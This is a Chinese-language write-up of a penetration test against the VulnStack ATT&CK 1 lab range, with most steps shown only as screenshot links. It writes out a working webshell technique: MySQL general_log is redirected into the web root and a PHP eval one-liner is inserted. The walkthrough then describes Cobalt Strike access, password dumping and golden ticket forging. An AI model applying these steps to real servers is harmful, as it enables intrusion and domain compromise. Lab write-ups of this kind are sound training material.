目录

VulnStack ATT&CK 1 靶场

VulnStack ATT&CK 1 靶场

环境

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115230.png-water_print

信息收集

端口探测

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115357.png-water_print

只开放了803306

目录扫描

访问 80 端口,发现首页为 PHP 探针:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115600.png-water_print

目录扫描: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115450.png-water_print

发现 phpmyadmin。

漏洞挖掘

phpmyadmin 尝试若口令登录: root:root 登录成功。

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115724.png-water_print

phpmyadmin 后台的 getshell 方法有很多种 先看下常规的 select into outfile

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115754.png-water_print

这里 secure_file_privnull,不允许写入写出。 放弃此方法,尝试 MySQL 通用查询日志 general_log 写出 webshell。 先看下全局变量的配置 show global variables like '%general%'

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416115844.png-water_print

这里并没有开启通用日志,那我就自己打开,并自定义保存文件:

1
2
SET GLOBAL general_log = 'ON'
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php'

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120022.png-water_print

这里的绝对路径是通过前面的探针获取到的。

然后写 webshell select '<?php @eval($_POST["bbll]);?>'

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120045.png-water_print

蚁剑连接:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120108.png-water_print

内网渗透

首先查看系统位数:

1
wmic cpu get addresswidth

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120239.png-water_print

用 cs 生成木马,上传:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120319.png-water_print

执行:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120340.png-water_print

上线,直接是管理员权限:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120400.png-water_print

查看用户权限:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120421.png-water_print

查看当前登录域:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120653.png-water_print

查看域内用户:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120848.png-water_print

查看域内主机:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120908.png-water_print

查看域管:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416120941.png-water_print

dump 密码:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416121030.png-water_print

横向移动

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416121203.png-water_print

DC 上线后,使用 hashdump dump krbtgt NTLM Hash:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416121319.png-water_print

制作黄金票据: https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200416121339.png-water_print